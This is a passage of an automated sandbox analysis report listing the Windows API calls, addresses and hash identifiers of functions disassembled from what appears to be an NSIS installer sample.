                            • Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
                            • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                            • Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                            • CompareFileTime.KERNEL32(-00000014,?,0040A5C8,0040A5C8,00000000,00000000,0040A5C8,00436000,?,?,00000031), ref: 004017D5
                              • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                              • Part of subcall function 00405569: lstrlenW.KERNEL32(004226E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                              • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,004226E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                              • Part of subcall function 00405569: lstrcatW.KERNEL32(004226E8,004033ED), ref: 004055C4
                              • Part of subcall function 00405569: SetWindowTextW.USER32(004226E8,004226E8), ref: 004055D6
                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                              • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                            • String ID:
                            • API String ID: 1941528284-0
                            • Opcode ID: b7a5c6d7991662512772549b684664b1194690f22d2238f758046a2bb3bdcfd9
                            • Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
                            • Opcode Fuzzy Hash: b7a5c6d7991662512772549b684664b1194690f22d2238f758046a2bb3bdcfd9
                            • Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: CloseEnum$DeleteValue
                            • String ID:
                            • API String ID: 1354259210-0
                            • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                            • Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
                            • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                            • Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetDlgItem.USER32(?,?), ref: 00401D9A
                            • GetClientRect.USER32(?,?), ref: 00401DE5
                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                            • DeleteObject.GDI32(00000000), ref: 00401E39
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                            • String ID:
                            • API String ID: 1849352358-0
                            • Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                            • Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
                            • Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                            • Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetDC.USER32(?), ref: 00401E51
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                            • ReleaseDC.USER32(?,00000000), ref: 00401E84
                              • Part of subcall function 00406544: lstrcatW.KERNEL32(004281C0,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                              • Part of subcall function 00406544: lstrlenW.KERNEL32(004281C0,00000000,004226E8,?,004055A0,004226E8,00000000), ref: 00406743
                            • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                            • String ID:
                            • API String ID: 2584051700-0
                            • Opcode ID: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
                            • Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
                            • Opcode Fuzzy Hash: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
                            • Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: MessageSend$Timeout
                            • String ID: !
                            • API String ID: 1777923405-2657877971
                            • Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                            • Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
                            • Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                            • Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                            • wsprintfW.USER32 ref: 00404DBA
                            • SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: ItemTextlstrlenwsprintf
                            • String ID: %u.%u%s%s
                            • API String ID: 3540041739-3551169577
                            • Opcode ID: 86e502d9a8370dbc93398d3fbd174d64265af359c40653ed6c33f1a653f0c3b2
                            • Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
                            • Opcode Fuzzy Hash: 86e502d9a8370dbc93398d3fbd174d64265af359c40653ed6c33f1a653f0c3b2
                            • Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateDirectoryW.KERNEL32(?,?,00437800), ref: 00405A7B
                            • GetLastError.KERNEL32 ref: 00405A8F
                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
                            • GetLastError.KERNEL32 ref: 00405AAE
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                            • String ID:
                            • API String ID: 3449924974-0
                            • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                            • Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
                            • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                            • Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
                            • GetTickCount.KERNEL32 ref: 0040304A
                            • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                            • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                            • String ID:
                            • API String ID: 2102729457-0
                            • Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                            • Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
                            • Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                            • Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • IsWindowVisible.USER32(?), ref: 0040550C
                            • CallWindowProcW.USER32(?,?,?,?), ref: 0040555D
                              • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: Window$CallMessageProcSendVisible
                            • String ID:
                            • API String ID: 3748168415-3916222277
                            • Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                            • Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
                            • Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                            • Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetTickCount.KERNEL32 ref: 00406044
                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,?,004034F5,00437000,00437800,00437800,00437800,00437800,00437800,00437800,004037DA), ref: 0040605F
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: CountFileNameTempTick
                            • String ID: nsa
                            • API String ID: 1716503409-2209301699
                            • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                            • Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
                            • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                            • Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                            • Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
                            • Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                            • Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                            • Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
                            • Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                            • Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                            • Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
                            • Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                            • Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                            • Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
                            • Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                            • Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                            • Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
                            • Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                            • Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                            • Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
                            • Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                            • Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                            • Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
                            • Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                            • Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F84
                            • CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
                            • lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                            Memory Dump Source
                            • Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Vitis.jbxd
                            Similarity
                            • API ID: lstrlen$CharNextlstrcmpi
                            • String ID:
                            • API String ID: 190613189-0
                            • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                            • Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
                            • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                            • Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9
                            Uniqueness

                            Uniqueness Score: -1.00%